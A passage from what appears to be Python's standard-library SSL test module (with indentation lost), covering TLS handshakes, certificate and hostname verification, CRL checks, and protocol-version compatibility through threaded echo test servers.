with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname='localhost') as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
self.assertEqual(len(ctx.get_ca_certs()), 1)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx1.load_verify_locations(capath=CAPATH)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx2.load_verify_locations(capath=CAPATH)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s, server_hostname='localhost') as ss:
ss.connect(self.server_addr)
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
# A simple IO loop. Call func(*args) depending on the error we get
# (WANT_READ or WANT_WRITE) move data between the socket and the BIOs.
timeout = kwargs.get('timeout', 10)
deadline = time.monotonic() + timeout
count = 0
while True:
if time.monotonic() > deadline:
self.fail("timeout")
errno = None
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
def test_bio_handshake(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.load_verify_locations(SIGNING_CA)
sslobj = ctx.wrap_bio(incoming, outgoing, False,
SIGNED_CERTFILE_HOSTNAME)
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertIsNone(sslobj.version())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertIsNotNone(sslobj.version())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
try:
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
except ssl.SSLSyscallError:
# If the server shuts down the TCP connection without sending a
# secure shutdown message, this is reported as SSL_ERROR_SYSCALL
pass
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
def test_bio_read_write_data(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'FOO\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf, b'foo\n')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
class NetworkedTests(unittest.TestCase):
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with support.transient_internet(REMOTE_HOST):
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
@unittest.skipUnless(support.IPV6_ENABLED, 'Needs IPv6')
def test_get_server_certificate_ipv6(self):
with support.transient_internet('ipv6.google.com'):
_test_get_server_certificate(self, 'ipv6.google.com', 443)
_test_get_server_certificate_fail(self, 'ipv6.google.com', 443)
def _test_get_server_certificate(test, host, port, cert=None):
pem = ssl.get_server_certificate((host, port))
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=cert)
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
def _test_get_server_certificate_fail(test, host, port):
try:
pem = ssl.get_server_certificate((host, port), ca_certs=CERTFILE)
except ssl.SSLError as x:
#should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
test.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(1)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except (ssl.SSLError, ConnectionResetError, OSError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# OSError may occur with wrong protocols, e.g. both
# sides use PROTOCOL_TLS_SERVER.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
#
# bpo-31323: Store the exception as string to prevent
# a reference leak: server -> conn_errors -> exception
# -> traceback -> self (ConnectionHandler) -> server
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol is now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
try:
self.sock = self.sslconn.unwrap()
except OSError:
# Many tests shut the TCP connection down
# without an SSL shutdown. This causes
# unwrap() to raise OSError with errno=0!
pass
else:
self.sslconn = None
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except OSError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
npn_protocols=None, alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLS_SERVER)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if npn_protocols:
self.context.set_npn_protocols(npn_protocols)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_npn_protocols = []
self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen()
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
class EchoServer (asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = test_wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
# make sure that ConnectionHandler is removed from socket_map
asyncore.close_all(ignore_all=True)
def start (self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None,
session=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name, session=session) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'client_npn_protocol': s.selected_npn_protocol(),
'version': s.version(),
'session_reused': s.session_reused,
'session': s.session,
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_npn_protocols'] = server.selected_npn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_TLS:
client_context.set_ciphers("ALL")
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(CERTFILE)
ctx.load_verify_locations(CERTFILE)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
if protocol in {ssl.PROTOCOL_TLS_CLIENT, ssl.PROTOCOL_TLS_SERVER}:
continue
with self.subTest(protocol=ssl._PROTOCOL_NAMES[protocol]):
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
client_context, server_context, hostname = testing_context()
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_SERVER):
server_params_test(client_context=client_context,
server_context=server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
client_context.check_hostname = False
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_SERVER):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=server_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
do_handshake_on_connect=False,
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# getpeercert() raise ValueError while the handshake isn't
# done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(client_context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
client_context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
client_context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(ssl.CertificateError,
"hostname 'invalid' doesn't match 'localhost'"):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
client_context.wrap_socket(s)
def test_wrong_cert(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
"wrongcert.pem")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_REQUIRED,
cacerts=CERTFILE, chatty=False,
connectionchatty=False)
with server, \
socket.socket() as sock, \
test_wrap_socket(sock, certfile=certfile) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = test_wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
def test_ssl_cert_verify_error(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
try:
s.connect((HOST, server.port))
except ssl.SSLError as e:
msg = 'unable to get local issuer certificate'
self.assertIsInstance(e, ssl.SSLCertVerificationError)
self.assertEqual(e.verify_code, 20)
self.assertEqual(e.verify_message, msg)
self.assertIn(msg, repr(e))
self.assertIn('certificate verify failed', repr(e))
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
"OpenSSL is compiled without SSLv2 support")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
def test_PROTOCOL_TLS(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1')
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
"OpenSSL is compiled without SSLv3 support")
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS,
False, client_options=ssl.OP_NO_SSLv2)
@skip_if_broken_ubuntu_ssl
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
"TLS version 1.1 not supported.")
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
